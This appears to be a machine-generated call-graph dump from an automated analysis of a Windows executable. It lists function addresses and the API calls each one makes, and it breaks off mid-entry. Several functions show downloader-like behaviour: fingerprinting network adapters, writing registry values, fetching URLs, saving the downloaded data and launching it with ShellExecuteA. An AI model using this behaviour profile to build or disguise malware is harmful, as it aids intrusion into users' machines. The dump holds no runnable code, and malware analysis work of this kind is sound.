43333 421101 76 API calls 5 library calls 42673->43333 43334 420546 58 API calls __vsnwprintf_s_l 42673->43334 42675 411223 GetFileSizeEx 42674->42675 42676 411287 42674->42676 42677 4112a3 VirtualAlloc 42675->42677 42678 411234 42675->42678 42676->42291 42680 41131a CloseHandle 42677->42680 42685 4112c0 _memset 42677->42685 42678->42677 42679 41123c CloseHandle 42678->42679 42681 413100 59 API calls 42679->42681 42680->42291 42682 411253 42681->42682 43566 4159d0 42682->43566 42684 4113a7 42687 4113b7 SetFilePointer 42684->42687 42685->42684 42686 4112e9 SetFilePointerEx 42685->42686 42689 411332 ReadFile 42686->42689 42690 41130c VirtualFree 42686->42690 42691 4113f5 ReadFile 42687->42691 42754 4115ae 42687->42754 42689->42690 42692 41134f 42689->42692 42690->42680 42693 411440 42691->42693 42694 41140f VirtualFree CloseHandle 42691->42694 42692->42690 42696 411356 42692->42696 42699 411471 lstrlenA 42693->42699 42700 411718 lstrlenA 42693->42700 42693->42754 42697 41142f 42694->42697 42695 4115c5 SetFilePointerEx 42695->42694 42698 4115df 42695->42698 42696->42687 42703 412c40 59 API calls 42696->42703 42697->42291 42754->42695 42759->42293 42761 41bab9 42760->42761 42762 41babb ShowWindow UpdateWindow 42760->42762 42761->42296 42762->42296 42775->42082 42776->42117 42778 411ad0 42777->42778 42779 411af4 42777->42779 42780 411afc 42778->42780 42781 411adc DispatchMessageW PeekMessageW 42778->42781 42779->42126 42780->42126 42781->42778 42781->42779 42782->42127 42783->42267 42784->42299 42786 413ff0 59 API calls 42785->42786 42787 41303e 42786->42787 42787->42414 42790 415d66 42789->42790 42791 415dfe 42789->42791 42794 416950 59 API calls 42790->42794 42798 415d84 ___check_float_string 42790->42798 42792 44f23e 59 API calls 42791->42792 42793 415e08 42792->42793 42795 44f23e 59 API calls 42793->42795 42796 415d76 42794->42796 42797 415e1a 42795->42797 42796->42431 42797->42431 42798->42431 42799->42431 42801 420241 42800->42801 42802 4202b6 42800->42802 42805 425208 __vsnwprintf_s_l 58 API calls 42801->42805 42809 420266 42801->42809 42811 4202c8 60 API calls 3 library calls 42802->42811 42804 4202c3 42804->42446 42806 42024d 42805->42806 42810 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42806->42810 42808 420258 42808->42446 42809->42446 42810->42808 42811->42804 42812->42472 42813->42473 42815 423b4c 59 API calls 42814->42815 42816 40b164 42815->42816 42817 40b177 SysAllocString 42816->42817 42818 40b194 42816->42818 42817->42818 42818->42486 42820 40b1de 42819->42820 42822 40b202 42819->42822 42821 40b1f5 SysFreeString 42820->42821 42820->42822 42821->42822 42822->42488 42824 423add __aulldiv 42823->42824 42824->42525 42838 43035d 42825->42838 42827 42355a 42828 40d78f 42827->42828 42846 423576 42827->42846 42830 4228e0 42828->42830 42943 42279f 42830->42943 42834 40b423 42833->42834 42835 40b41d 42833->42835 42836 40b42d VariantClear 42834->42836 42835->42547 42836->42547 42837->42499 42839 42501f __getptd_noexit 58 API calls 42838->42839 42840 430363 42839->42840 42842 43038d 42840->42842 42845 430369 42840->42845 42879 428cde 58 API calls 2 library calls 42840->42879 42841 425208 __vsnwprintf_s_l 58 API calls 42843 43036e 42841->42843 42842->42827 42843->42827 42845->42841 42845->42842 42847 423591 42846->42847 42848 4235a9 _memset 42846->42848 42849 425208 __vsnwprintf_s_l 58 API calls 42847->42849 42848->42847 42855 4235c0 42848->42855 42850 423596 42849->42850 42888 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42850->42888 42852 4235cb 42854 425208 __vsnwprintf_s_l 58 API calls 42852->42854 42853 4235e9 42880 42fb64 42853->42880 42878 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 42854->42878 42855->42852 42855->42853 42857 4235ee 42889 42f803 58 API calls __vsnwprintf_s_l 42857->42889 42859 4235f7 42860 4237e5 42859->42860 42890 42f82d 58 API calls __vsnwprintf_s_l 42859->42890 42903 4242fd 8 API calls 2 library calls 42860->42903 42863 423609 42863->42860 42891 42f857 42863->42891 42864 4237ef 42866 42361b 42866->42860 42867 423624 42866->42867 42868 42369b 42867->42868 42870 423637 42867->42870 42901 42f939 58 API calls 4 library calls 42868->42901 42898 42f939 58 API calls 4 library calls 42870->42898 42871 4236a2 42871->42878 42902 42fbb4 58 API calls 4 library calls 42871->42902 42873 42364f 42873->42878 42899 42fbb4 58 API calls 4 library calls 42873->42899 42876 423668 42876->42878 42900 42f939 58 API calls 4 library calls 42876->42900 42878->42828 42879->42845 42881 42fb70 __initptd 42880->42881 42882 42fba5 __initptd 42881->42882 42883 428af7 __lock 58 API calls 42881->42883 42882->42857 42884 42fb80 42883->42884 42885 42fb93 42884->42885 42904 42fe47 42884->42904 42933 42fbab LeaveCriticalSection _doexit 42885->42933 42888->42878 42889->42859 42890->42863 42892 42f861 42891->42892 42893 42f876 42891->42893 42894 425208 __vsnwprintf_s_l 58 API calls 42892->42894 42893->42866 42895 42f866 42894->42895 42942 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42895->42942 42897 42f871 42897->42866 42898->42873 42899->42876 42900->42878 42901->42871 42902->42878 42903->42864 42905 42fe53 __initptd 42904->42905 42906 428af7 __lock 58 API calls 42905->42906 42907 42fe71 __tzset_nolock 42906->42907 42908 42f857 __tzset_nolock 58 API calls 42907->42908 42909 42fe86 42908->42909 42931 42ff25 __tzset_nolock __isindst_nolock 42909->42931 42934 42f803 58 API calls __vsnwprintf_s_l 42909->42934 42912 42fe98 42912->42931 42935 42f82d 58 API calls __vsnwprintf_s_l 42912->42935 42913 42ff71 GetTimeZoneInformation 42913->42931 42914 420bed _free 58 API calls 42914->42931 42916 42feaa 42916->42931 42936 433f99 58 API calls 2 library calls 42916->42936 42918 42ffd8 WideCharToMultiByte 42918->42931 42919 42feb8 42937 441667 78 API calls 3 library calls 42919->42937 42920 430010 WideCharToMultiByte 42920->42931 42923 42ff0c _strlen 42938 428cde 58 API calls 2 library calls 42923->42938 42924 43ff8e 58 API calls __tzset_nolock 42924->42931 42926 42fed9 _is_exception_typeof 42926->42923 42927 420bed _free 58 API calls 42926->42927 42926->42931 42927->42923 42928 42ff1a _strlen 42928->42931 42939 42c0fd 58 API calls __vsnwprintf_s_l 42928->42939 42930 430157 __tzset_nolock __initptd __isindst_nolock 42930->42885 42931->42913 42931->42914 42931->42918 42931->42920 42931->42924 42931->42930 42932 423c2d 61 API calls UnDecorator::getTemplateConstant 42931->42932 42940 4242fd 8 API calls 2 library calls 42931->42940 42941 4300d7 LeaveCriticalSection _doexit 42931->42941 42932->42931 42933->42882 42934->42912 42935->42916 42936->42919 42937->42926 42938->42928 42939->42931 42940->42931 42941->42931 42942->42897 42970 42019c 42943->42970 42946 4227d4 42947 425208 __vsnwprintf_s_l 58 API calls 42946->42947 42948 4227d9 42947->42948 42978 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42948->42978 42949 4227e9 MultiByteToWideChar 42951 422804 GetLastError 42949->42951 42952 422815 42949->42952 42979 4251e7 58 API calls 3 library calls 42951->42979 42980 428cde 58 API calls 2 library calls 42952->42980 42955 42281d 42956 422825 MultiByteToWideChar 42955->42956 42969 422810 42955->42969 42956->42951 42958 42283f 42956->42958 42957 420bed _free 58 API calls 42959 4228a0 42957->42959 42981 428cde 58 API calls 2 library calls 42958->42981 42961 420bed _free 58 API calls 42959->42961 42963 40d7a3 42961->42963 42962 42284a 42962->42969 42982 42d51e 88 API calls 3 library calls 42962->42982 42963->42530 42965 422866 42966 42286f WideCharToMultiByte 42965->42966 42965->42969 42967 42288b GetLastError 42966->42967 42966->42969 42983 4251e7 58 API calls 3 library calls 42967->42983 42969->42957 42971 4201ad 42970->42971 42972 4201fa 42970->42972 42984 425007 42971->42984 42972->42946 42972->42949 42975 4201da 42975->42972 42990 42495e 58 API calls 6 library calls 42975->42990 42978->42963 42979->42969 42980->42955 42981->42962 42982->42965 42983->42969 42985 42501f __getptd_noexit 58 API calls 42984->42985 42986 42500d 42985->42986 42987 4201b3 42986->42987 42991 427c2e 58 API calls 3 library calls 42986->42991 42987->42975 42989 4245dc 58 API calls 6 library calls 42987->42989 42989->42975 42990->42972 42993 420c62 _malloc 58 API calls 42992->42993 42994 40e684 42993->42994 42995 420c62 _malloc 58 API calls 42994->42995 42996 40e690 42995->42996 42997 40e6b4 GetAdaptersInfo 42996->42997 42998 40e699 42996->42998 42999 40e6c4 42997->42999 43000 40e6db GetAdaptersInfo 42997->43000 43001 421f2d _wprintf 85 API calls 42998->43001 43002 420bed _free 58 API calls 42999->43002 43003 40e741 43000->43003 43004 40e6ea 43000->43004 43005 40e6a3 43001->43005 43007 40e6ca 43002->43007 43006 420bed _free 58 API calls 43003->43006 43042 4204a6 43004->43042 43009 420bed _free 58 API calls 43005->43009 43011 40e74a 43006->43011 43012 420c62 _malloc 58 API calls 43007->43012 43010 40e6a9 43009->43010 43010->42558 43011->42558 43014 40e6d2 43012->43014 43014->42998 43014->43000 43016 40e737 43017 421f2d _wprintf 85 API calls 43016->43017 43017->43003 43019 4156d0 59 API calls 43018->43019 43020 40e8bb CryptAcquireContextW 43019->43020 43021 40e8d8 43020->43021 43022 40e8e9 CryptCreateHash 43020->43022 43267 430eca RaiseException 43021->43267 43024 40e903 43022->43024 43025 40e914 CryptHashData 43022->43025 43268 430eca RaiseException 43024->43268 43027 40e932 43025->43027 43028 40e943 CryptGetHashParam 43025->43028 43269 430eca RaiseException 43027->43269 43030 40e963 43028->43030 43032 40e974 _memset 43028->43032 43270 430eca RaiseException 43030->43270 43033 40e993 CryptGetHashParam 43032->43033 43034 40e9a8 43033->43034 43041 40e9b9 43033->43041 43271 430eca RaiseException 43034->43271 43036 40ea10 43038 40ea16 CryptDestroyHash CryptReleaseContext 43036->43038 43037 4204a6 _sprintf 83 API calls 43037->43041 43039 40ea33 43038->43039 43039->42564 43040 413ea0 59 API calls 43040->43041 43041->43036 43041->43037 43041->43040 43043 4204c2 43042->43043 43044 4204d7 43042->43044 43045 425208 __vsnwprintf_s_l 58 API calls 43043->43045 43044->43043 43046 4204de 43044->43046 43047 4204c7 43045->43047 43071 426ab6 43046->43071 43070 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43047->43070 43051 40e725 43053 421f2d 43051->43053 43054 421f39 __initptd 43053->43054 43055 421f4a 43054->43055 43056 421f5f __flswbuf 43054->43056 43057 425208 __vsnwprintf_s_l 58 API calls 43055->43057 43115 420e92 43056->43115 43058 421f4f 43057->43058 43131 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43058->43131 43061 421f6f __flswbuf 43120 42afd2 43061->43120 43062 421f5a __initptd 43062->43016 43064 421f82 __flswbuf 43065 426ab6 __output_l 83 API calls 43064->43065 43066 421f9b __flswbuf 43065->43066 43127 42afa1 43066->43127 43070->43051 43072 42019c _LocaleUpdate::_LocaleUpdate 58 API calls 43071->43072 43073 426b2b 43072->43073 43074 425208 __vsnwprintf_s_l 58 API calls 43073->43074 43075 426b30 43074->43075 43076 427601 43075->43076 43085 426b50 __aulldvrm __woutput_s_l _strlen 43075->43085 43103 42816b 43075->43103 43077 425208 __vsnwprintf_s_l 58 API calls 43076->43077 43078 427606 43077->43078 43112 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43078->43112 43080 4275db 43096 42a77e 43080->43096 43083 420504 43083->43051 43095 4264ef 78 API calls 7 library calls 43083->43095 43085->43076 43085->43080 43086 42766a 78 API calls _write_multi_char 43085->43086 43087 4271b9 DecodePointer 43085->43087 43088 4276b2 78 API calls _write_multi_char 43085->43088 43089 420bed _free 58 API calls 43085->43089 43091 42721c DecodePointer 43085->43091 43092 427241 DecodePointer 43085->43092 43093 43adf7 60 API calls __cftof 43085->43093 43094 4276de 78 API calls _write_string 43085->43094 43110 422bcc 58 API calls _LocaleUpdate::_LocaleUpdate 43085->43110 43111 428cde 58 API calls 2 library calls 43085->43111 43086->43085 43087->43085 43088->43085 43089->43085 43091->43085 43092->43085 43093->43085 43094->43085 43095->43051 43097 42a786 43096->43097 43098 42a788 IsProcessorFeaturePresent 43096->43098 43097->43083 43100 42ab9c 43098->43100 43113 42ab4b 5 API calls ___raise_securityfailure 43100->43113 43102 42ac7f 43102->43083 43104 428175 43103->43104 43105 42818a 43103->43105 43106 425208 __vsnwprintf_s_l 58 API calls 43104->43106 43105->43085 43107 42817a 43106->43107 43114 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43107->43114 43109 428185 43109->43085 43110->43085 43111->43085 43112->43080 43113->43102 43114->43109 43116 420eb3 EnterCriticalSection 43115->43116 43117 420e9d 43115->43117 43116->43061 43118 428af7 __lock 58 API calls 43117->43118 43119 420ea6 43118->43119 43119->43061 43121 42816b __fgetwc_nolock 58 API calls 43120->43121 43122 42afdf 43121->43122 43133 4389c2 43122->43133 43124 42afe5 __flswbuf 43125 42b034 43124->43125 43142 428cde 58 API calls 2 library calls 43124->43142 43125->43064 43128 421faf 43127->43128 43129 42afaa 43127->43129 43132 421fc9 LeaveCriticalSection LeaveCriticalSection __flswbuf __getstream 43128->43132 43129->43128 43144 42836b 43129->43144 43131->43062 43132->43062 43134 4389da 43133->43134 43135 4389cd 43133->43135 43137 4389e6 43134->43137 43138 425208 __vsnwprintf_s_l 58 API calls 43134->43138 43136 425208 __vsnwprintf_s_l 58 API calls 43135->43136 43139 4389d2 43136->43139 43137->43124 43140 438a07 43138->43140 43139->43124 43143 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43140->43143 43142->43125 43143->43139 43145 42837e 43144->43145 43149 4283a2 43144->43149 43146 42816b __fgetwc_nolock 58 API calls 43145->43146 43145->43149 43147 42839b 43146->43147 43150 42df14 43147->43150 43149->43128 43151 42df20 __initptd 43150->43151 43152 42df44 43151->43152 43153 42df2d 43151->43153 43155 42dfe3 43152->43155 43157 42df58 43152->43157 43250 4251d4 58 API calls __getptd_noexit 43153->43250 43254 4251d4 58 API calls __getptd_noexit 43155->43254 43156 42df32 43159 425208 __vsnwprintf_s_l 58 API calls 43156->43159 43160 42df80 43157->43160 43161 42df76 43157->43161 43170 42df39 __initptd 43159->43170 43178 43b134 43160->43178 43251 4251d4 58 API calls __getptd_noexit 43161->43251 43162 42df7b 43166 425208 __vsnwprintf_s_l 58 API calls 43162->43166 43165 42df86 43167 42df99 43165->43167 43168 42dfac 43165->43168 43169 42dfef 43166->43169 43187 42e003 43167->43187 43171 425208 __vsnwprintf_s_l 58 API calls 43168->43171 43255 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43169->43255 43170->43149 43174 42dfb1 43171->43174 43252 4251d4 58 API calls __getptd_noexit 43174->43252 43175 42dfa5 43253 42dfdb LeaveCriticalSection __unlock_fhandle 43175->43253 43180 43b140 __initptd 43178->43180 43179 43b18f EnterCriticalSection 43181 43b1b5 __initptd 43179->43181 43180->43179 43182 428af7 __lock 58 API calls 43180->43182 43181->43165 43183 43b165 43182->43183 43184 43b17d 43183->43184 43256 43263e InitializeCriticalSectionAndSpinCount 43183->43256 43257 43b1b9 LeaveCriticalSection _doexit 43184->43257 43188 42e010 __write_nolock 43187->43188 43189 42e06e 43188->43189 43190 42e04f 43188->43190 43223 42e044 43188->43223 43193 42e0c6 43189->43193 43194 42e0aa 43189->43194 43258 4251d4 58 API calls __getptd_noexit 43190->43258 43191 42a77e _LanguageEnumProc@4 6 API calls 43195 42e864 43191->43195 43199 42e0df 43193->43199 43262 42f744 60 API calls 3 library calls 43193->43262 43260 4251d4 58 API calls __getptd_noexit 43194->43260 43195->43175 43196 42e054 43198 425208 __vsnwprintf_s_l 58 API calls 43196->43198 43201 42e05b 43198->43201 43203 4389c2 __write_nolock 58 API calls 43199->43203 43200 42e0af 43204 425208 __vsnwprintf_s_l 58 API calls 43200->43204 43259 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43201->43259 43206 42e0ed 43203->43206 43207 42e0b6 43204->43207 43208 42e446 43206->43208 43212 425007 _LanguageEnumProc@4 58 API calls 43206->43212 43261 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43207->43261 43209 42e464 43208->43209 43210 42e7d9 WriteFile 43208->43210 43213 42e588 43209->43213 43221 42e47a 43209->43221 43214 42e439 GetLastError 43210->43214 43238 42e678 43210->43238 43215 42e119 GetConsoleMode 43212->43215 43217 42e593 43213->43217 43218 42e67d 43213->43218 43225 42e406 43214->43225 43215->43208 43219 42e158 43215->43219 43216 42e812 43216->43223 43224 425208 __vsnwprintf_s_l 58 API calls 43216->43224 43217->43216 43231 42e5f8 WriteFile 43217->43231 43218->43216 43230 42e6f2 WideCharToMultiByte 43218->43230 43219->43208 43220 42e168 GetConsoleCP 43219->43220 43220->43216 43246 42e197 43220->43246 43221->43216 43222 42e4e9 WriteFile 43221->43222 43221->43225 43222->43214 43222->43221 43223->43191 43227 42e840 43224->43227 43225->43216 43225->43223 43226 42e566 43225->43226 43228 42e571 43226->43228 43229 42e809 43226->43229 43266 4251d4 58 API calls __getptd_noexit 43227->43266 43233 425208 __vsnwprintf_s_l 58 API calls 43228->43233 43265 4251e7 58 API calls 3 library calls 43229->43265 43230->43214 43243 42e739 43230->43243 43231->43214 43235 42e647 43231->43235 43236 42e576 43233->43236 43235->43217 43235->43225 43235->43238 43264 4251d4 58 API calls __getptd_noexit 43236->43264 43237 42e741 WriteFile 43241 42e794 GetLastError 43237->43241 43237->43243 43238->43225 43241->43243 43242 43c76c 60 API calls __fgetwc_nolock 43242->43246 43243->43218 43243->43225 43243->43237 43243->43238 43244 44058c WriteConsoleW CreateFileW __putwch_nolock 43248 42e2ed 43244->43248 43245 42e280 WideCharToMultiByte 43245->43225 43247 42e2bb WriteFile 43245->43247 43246->43225 43246->43242 43246->43245 43246->43248 43263 422d33 58 API calls __isleadbyte_l 43246->43263 43247->43214 43247->43248 43248->43214 43248->43225 43248->43244 43248->43246 43249 42e315 WriteFile 43248->43249 43249->43214 43249->43248 43250->43156 43251->43162 43252->43175 43253->43170 43254->43162 43255->43170 43256->43184 43257->43179 43258->43196 43259->43223 43260->43200 43261->43223 43262->43199 43263->43246 43264->43223 43265->43223 43266->43223 43267->43022 43268->43025 43269->43028 43270->43032 43271->43041 43273 413c62 43272->43273 43280 413c74 _memset 43272->43280 43274 413c67 43273->43274 43275 413c96 43273->43275 43277 423b4c 59 API calls 43274->43277 43276 44f23e 59 API calls 43275->43276 43278 413c6d 43276->43278 43277->43278 43278->43280 43289 44f1bb 59 API calls 3 library calls 43278->43289 43280->42569 43283 418513 43282->43283 43286 418520 43282->43286 43283->43286 43290 415810 59 API calls ___check_float_string 43283->43290 43285 418619 43285->42571 43286->43285 43287 44f23e 59 API calls 43286->43287 43288 416760 59 API calls 43286->43288 43287->43286 43288->43286 43290->43286 43291->42573 43292->42577 43293->42579 43294->42584 43295->42586 43296->42606 43297->42606 43298->42630 43299->42630 43300->42639 43301->42639 43302->42645 43335 421037 43303->43335 43305 40c78a 43305->42657 43332 420546 58 API calls __vsnwprintf_s_l 43305->43332 43307 422909 __initptd 43306->43307 43308 42291c 43307->43308 43309 422941 _GetLcidFromLanguage 43307->43309 43310 425208 __vsnwprintf_s_l 58 API calls 43308->43310 43537 420e53 43309->43537 43311 422921 43310->43311 43536 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43311->43536 43314 422950 43315 42292c __initptd 43332->42673 43333->42673 43334->42673 43338 421043 __initptd 43335->43338 43336 421056 43337 425208 __vsnwprintf_s_l 58 API calls 43336->43337 43340 42105b 43337->43340 43338->43336 43339 421087 43338->43339 43354 428df4 43339->43354 43384 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43340->43384 43343 42108c 43344 4210a2 43343->43344 43345 421095 43343->43345 43347 4210cc 43344->43347 43348 4210ac 43344->43348 43346 425208 __vsnwprintf_s_l 58 API calls 43345->43346 43353 421066 __initptd @_EH4_CallFilterFunc@8 43346->43353 43369 428f13 43347->43369 43349 425208 __vsnwprintf_s_l 58 API calls 43348->43349 43349->43353 43353->43305 43355 428e00 __initptd 43354->43355 43356 428af7 __lock 58 API calls 43355->43356 43367 428e0e 43356->43367 43357 428e82 43386 428f0a 43357->43386 43358 428e89 43390 428cde 58 API calls 2 library calls 43358->43390 43361 428e90 43361->43357 43391 43263e InitializeCriticalSectionAndSpinCount 43361->43391 43362 428eff __initptd 43362->43343 43364 428b9f __mtinitlocknum 58 API calls 43364->43367 43365 420e92 _flsall 59 API calls 43365->43367 43366 428eb6 EnterCriticalSection 43366->43357 43367->43357 43367->43358 43367->43364 43367->43365 43389 420efc LeaveCriticalSection LeaveCriticalSection _doexit 43367->43389 43378 428f33 _TestDefaultCountry 43369->43378 43370 428f4d 43371 425208 __vsnwprintf_s_l 58 API calls 43370->43371 43373 428f52 43371->43373 43372 429108 43372->43370 43376 42916b 43372->43376 43393 43c214 43376->43393 43378->43370 43378->43372 43397 43c232 60 API calls 2 library calls 43378->43397 43380 429101 43380->43372 43398 43c232 60 API calls 2 library calls 43380->43398 43384->43353 43392 428c81 LeaveCriticalSection 43386->43392 43388 428f11 43388->43362 43389->43367 43390->43361 43391->43366 43392->43388 43400 43b9f8 43393->43400 43397->43380 43536->43315 43538 420e63 43537->43538 43539 420e85 EnterCriticalSection 43537->43539 43538->43539 43540 420e6b 43538->43540 43542 420e7b 43539->43542 43541 428af7 __lock 58 API calls 43540->43541 43541->43542 43542->43314 43567 415ab8 43566->43567 43568 4159e8 43566->43568 43645 44f26c 59 API calls 3 library calls 43567->43645 43570 415ac2 43568->43570 43571 415a02 43568->43571 43645->43570 43951 42f7c0 __write_nolock 43950->43951 43952 41e6b6 timeGetTime 43951->43952 43953 423f74 58 API calls 43952->43953 43954 41e6cc 43953->43954 44065 40c6a0 RegOpenKeyExW 43954->44065 43957 41e72e InternetOpenW 44008 41e6d4 _memset _strstr _wcsstr 43957->44008 43958 41ea8d lstrlenA lstrcpyA lstrcpyA lstrlenA 43958->44008 43959 41ea4c SHGetFolderPathA 43960 41ea67 PathAppendA DeleteFileA 43959->43960 43959->44008 43960->44008 43962 41eada lstrlenA 43962->44008 43963 415ae0 59 API calls 43963->44008 43964 4156d0 59 API calls 43964->44008 43965 414690 59 API calls 43977 41e7be _memmove 43965->43977 43966 41ee4d 43967 40ef50 58 API calls 43966->43967 43972 41ee5d 43967->43972 43968 413ff0 59 API calls 43968->44008 43969 412900 60 API calls 43969->44008 43971 41eb53 lstrcpyW 43973 41eb74 lstrlenA 43971->43973 43971->44008 43975 413ea0 59 API calls 43972->43975 43979 41eeb1 43972->43979 43976 420c62 _malloc 58 API calls 43973->43976 43974 4159d0 59 API calls 43974->44008 43975->43972 43976->44008 43977->43965 43977->44008 44112 40dd40 73 API calls 4 library calls 43977->44112 43978 41e8f3 lstrcpyW 43981 41e943 InternetOpenUrlW InternetReadFile 43978->43981 43978->44008 43982 40ef50 58 API calls 43979->43982 43980 41eb99 MultiByteToWideChar lstrcpyW 43980->44008 43983 41e9ec InternetCloseHandle InternetCloseHandle 43981->43983 43984 41e97c SHGetFolderPathA 43981->43984 43989 41eec1 43982->43989 43983->44008 43984->43983 43985 41e996 PathAppendA 43984->43985 44090 4220b6 43985->44090 43986 41e93c lstrcatW 43986->43981 43987 41ec3d lstrlenW lstrlenA lstrcpyA lstrcpyA lstrlenA 43987->44008 43991 413ea0 59 API calls 43989->43991 43996 41ef12 43989->43996 43990 41ebf0 SHGetFolderPathA 43992 41ec17 PathAppendA DeleteFileA 43990->43992 43990->44008 43991->43989 43992->44008 43993 41e9c4 lstrlenA 44093 422b02 43993->44093 43995 41ecaa lstrlenA 43995->44008 43997 413ff0 59 API calls 43996->43997 43999 41ef3a 43997->43999 43998 423a38 __fcloseall 83 API calls 43998->44008 44000 412900 60 API calls 43999->44000 44002 41ef45 lstrcpyW 44000->44002 44001 41ed1f lstrcpyW 44003 41ed43 lstrlenA 44001->44003 44001->44008 44006 41ef6a 44002->44006 44005 420c62 _malloc 58 API calls 44003->44005 44005->44008 44007 413ff0 59 API calls 44006->44007 44009 41ef9f 44007->44009 44008->43957 44008->43958 44008->43959 44008->43962 44008->43963 44008->43964 44008->43966 44008->43968 44008->43969 44008->43971 44008->43973 44008->43974 44008->43977 44008->43978 44008->43980 44008->43981 44008->43983 44008->43986 44008->43987 44008->43990 44008->43993 44008->43995 44008->43998 44008->44001 44008->44003 44011 41ed68 MultiByteToWideChar lstrcpyW lstrlenW 44008->44011 44014 41edc3 SHGetFolderPathA 44008->44014 44017 420bed 58 API calls _free 44008->44017 44070 40c500 SHGetFolderPathA 44008->44070 44106 411b10 timeGetTime timeGetTime 44008->44106 44010 412900 60 API calls 44009->44010 44013 41efac lstrcpyW 44010->44013 44011->44008 44012 41edad lstrlenW 44011->44012 44012->44008 44018 41ee44 44012->44018 44013->44018 44014->44008 44016 41edea PathAppendA DeleteFileA 44014->44016 44016->44008 44017->44008 44020 41dbf6 __write_nolock 44019->44020 44021 413ff0 59 API calls 44020->44021 44022 41dc31 44021->44022 44023 4156d0 59 API calls 44022->44023 44024 41dc82 44023->44024 44025 413ff0 59 API calls 44024->44025 44026 41dcb1 44025->44026 44027 40ecb0 60 API calls 44026->44027 44028 41dcc5 44027->44028 44029 41dcf0 LoadLibraryW GetProcAddress 44028->44029 44043 41e3d3 44028->44043 44030 413c40 59 API calls 44029->44030 44031 41dd1a UuidCreate UuidToStringA 44030->44031 44033 41dd84 44031->44033 44033->44033 44034 4156d0 59 API calls 44033->44034 44035 41dda7 RpcStringFreeA PathAppendA CreateDirectoryA 44034->44035 44036 4184e0 59 API calls 44035->44036 44037 41de18 44036->44037 44038 413ff0 59 API calls 44037->44038 44039 41de4c 44038->44039 44040 412900 60 API calls 44039->44040 44041 41de5c 44040->44041 44042 413580 59 API calls 44041->44042 44057 41de73 _memset _wcsstr 44042->44057 44044 41deec InternetOpenA 44045 413ff0 59 API calls 44044->44045 44045->44057 44046 412900 60 API calls 44046->44057 44047 414690 59 API calls 44053 41df60 _memmove 44047->44053 44048 414690 59 API calls 44048->44057 44050 412840 60 API calls 44050->44057 44051 41e079 InternetOpenUrlA 44051->44057 44052 41e0e2 HttpQueryInfoW 44052->44057 44053->44047 44053->44057 44540 40dd40 73 API calls 4 library calls 44053->44540 44054 413ff0 59 API calls 44054->44057 44055 413010 59 API calls 44055->44057 44056 41e1ec lstrcpyA PathAppendA 44056->44057 44057->44043 44057->44044 44057->44046 44057->44048 44057->44050 44057->44051 44057->44052 44057->44053 44057->44054 44057->44055 44057->44056 44058 4156d0 59 API calls 44057->44058 44061 41e2b1 InternetReadFile 44057->44061 44062 41e316 CloseHandle InternetCloseHandle InternetCloseHandle 44057->44062 44063 41e2dc WriteFile 44057->44063 44064 41e334 ShellExecuteA 44057->44064 44059 41e267 CreateFileA 44058->44059 44059->44057 44060 41e299 SetFilePointer 44059->44060 44060->44057 44061->44057 44062->44057 44063->44057 44063->44062 44064->44057 44066 40c734 44065->44066 44067 40c6cc RegQueryValueExW 44065->44067 44066->44008 44068 40c70c RegSetValueExW RegCloseKey 44067->44068 44069 40c6fd RegCloseKey 44067->44069 44068->44066 44069->44008 44071 40c525 44070->44071 44072 40c52c PathAppendA 44070->44072 44071->44008 44073 4220b6 125 API calls 44072->44073 44074 40c550 44073->44074 44075 40c559 44074->44075 44113 42387f 44074->44113 44075->44008 44077 40c56c 44126 423455 44077->44126 44079 40c572 44139 420cf4 44079->44139 44081 40c57a 44082 40c5a5 44081->44082 44083 40c589 44081->44083 44084 423a38 __fcloseall 83 API calls 44082->44084 44156 4222f5 44083->44156 44086 40c5ab 44084->44086 44086->44008 44088 423a38 __fcloseall 83 API calls 44089 40c599 44088->44089 44089->44008 44446 421ff2 44090->44446 44092 4220c6 44092->44008 44094 422b0e __initptd 44093->44094 44095 422b44 44094->44095 44096 422b2c 44094->44096 44097 422b3c __initptd 44094->44097 44098 420e53 __lock_file 59 API calls 44095->44098 44099 425208 __vsnwprintf_s_l 58 API calls 44096->44099 44097->44008 44100 422b4a 44098->44100 44101 422b31 44099->44101 44538 4229a9 78 API calls 6 library calls 44100->44538 44537 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44101->44537 44104 422b5e 44539 422b7c LeaveCriticalSection LeaveCriticalSection _fseek 44104->44539 44107 411b7f 44106->44107 44108 411b2f 44106->44108 44107->44008 44108->44107 44109 411b40 PeekMessageW 44108->44109 44111 411b58 DispatchMessageW PeekMessageW 44108->44111 44109->44108 44110 411b70 Sleep timeGetTime 44109->44110 44110->44107 44110->44109 44111->44108 44111->44110 44112->43977 44114 42388b __initptd 44113->44114 44115 42389d 44114->44115 44116 4238c3 44114->44116 44117 425208 __vsnwprintf_s_l 58 API calls 44115->44117 44118 420e53 __lock_file 59 API calls 44116->44118 44119 4238a2 44117->44119 44120 4238c9 44118->44120 44171 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44119->44171 44159 4237f0 44120->44159 44125 4238ad __initptd 44125->44077 44127 423461 __initptd 44126->44127 44128 423473 44127->44128 44129 423488 44127->44129 44130 425208 __vsnwprintf_s_l 58 API calls 44128->44130 44131 420e53 __lock_file 59 API calls 44129->44131 44132 423478 44130->44132 44133 42348e 44131->44133 44268 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44132->44268 44134 4230c5 __ftell_nolock 67 API calls 44133->44134 44136 423499 44134->44136 44269 4234b9 LeaveCriticalSection LeaveCriticalSection _fseek 44136->44269 44138 423483 __initptd 44138->44079 44140 420d00 __initptd 44139->44140 44141 420d24 44140->44141 44142 420d0e 44140->44142 44144 42816b __fgetwc_nolock 58 API calls 44141->44144 44143 425208 __vsnwprintf_s_l 58 API calls 44142->44143 44145 420d13 44143->44145 44146 420d2d 44144->44146 44270 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44145->44270 44148 